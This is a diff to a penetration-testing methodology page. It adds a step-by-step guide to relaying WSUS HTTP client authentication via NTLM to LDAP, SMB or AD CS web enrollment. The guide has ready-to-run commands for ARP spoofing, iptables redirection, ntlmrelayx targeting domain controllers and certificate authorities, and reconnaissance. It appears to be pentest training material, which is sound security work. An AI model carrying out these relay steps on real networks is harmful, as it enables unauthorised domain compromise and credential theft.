WSUS Is SUS NTLM Relay Attacks in Plain Sight

src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md

@@ -115,6 +115,67 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
 
 These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
 
+### Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)
+
+WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends into normal update traffic and frequently yields machine-account authentications (HOST$).
+
+What to look for
+- GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and ...\WindowsUpdate\AU:
+  - WUServer (e.g., http://wsus.domain.local:8530)
+  - WUStatusServer (reporting URL)
+  - UseWUServer (1 = WSUS; 0 = Microsoft Update)
+  - DetectionFrequencyEnabled and DetectionFrequency (hours)
+- WSUS SOAP endpoints used by clients over HTTP:
+  - /ClientWebService/client.asmx (approvals)
+  - /ReportingWebService/reportingwebservice.asmx (status)
+- Default ports: 8530/tcp HTTP, 8531/tcp HTTPS
+
+Reconnaissance
+- Unauthenticated
+  - Scan for listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL <hosts>
+  - Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
+- Authenticated
+  - Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
+  - Query endpoints at scale from hosts (NetExec) or locally:
+    nxc smb <ip> -u <user> -p <pass> -M reg-query -o PATH="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate" KEY="WUServer"
+    reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
+
+End-to-end HTTP relay steps
+1) Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof:
+    arpspoof -i <iface> -t <wsus_client_ip> <wsus_server_ip>
+
+2) Redirect port 8530 to your relay listener (optional, convenient):
+    iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530
+    iptables -t nat -L PREROUTING --line-numbers
+
+3) Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below):
+    ntlmrelayx.py -t ldap://<DC> -smb2support -socks --keep-relaying --http-port 8530
+
+   Other common targets:
+   - Relay to SMB (if signing off) for exec/dump: -t smb://<host>
+   - Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://<DC>
+   - Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT:
+        ntlmrelayx.py --http-port 8530 -t http://<CA>/certsrv/certfnsh.asp --adcs --no-http-server
+     For deeper AD CS abuse paths and tooling, see the AD CS page:
+
+{{#ref}}
+../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+{{#endref}}
+
+4) Trigger a client check-in or wait for schedule. From a client:
+    wuauclt.exe /detectnow
+   or use the Windows Update UI (Check for updates).
+
+5) Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication).
+
+HTTPS constraint (8531)
+- Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic.
+
+Notes
+- WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments.
+- Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
+- Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).
+
 ### Force NTLM Logins
 
 In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
@@ -243,6 +304,14 @@ You now own **NT AUTHORITY\SYSTEM**.
 - [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
 - [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
 - [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
+- [WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)](https://trustedsec.com/blog/wsus-is-sus-ntlm-relay-attacks-in-plain-sight)
+- [GoSecure – Abusing WSUS to enable NTLM relaying attacks](https://gosecure.ai/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks)
+- [Impacket PR #2034 – Restore HTTP server in ntlmrelayx](https://github.com/fortra/impacket/pull/2034)
+- [Impacket PR #913 – HTTP relay support](https://github.com/fortra/impacket/pull/913)
+- [WSUScripts – wsusniff.py](https://github.com/Coontzy1/WSUScripts/blob/main/wsusniff.py)
+- [WSUScripts – wsuspider.sh](https://github.com/Coontzy1/WSUScripts/blob/main/wsuspider.sh)
+- [MS-WSUSOD – Windows Server Update Services: Server-to-Client Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wsusod/e00a5e81-c600-40d9-96b5-9cab78364416)
+- [Microsoft – WSUS deprecation announcement](https://techcommunity.microsoft.com/blog/windows-itpro-blog/windows-server-update-services-wsus-deprecation/4250436)
 
 {{#include ../../banners/hacktricks-training.md}}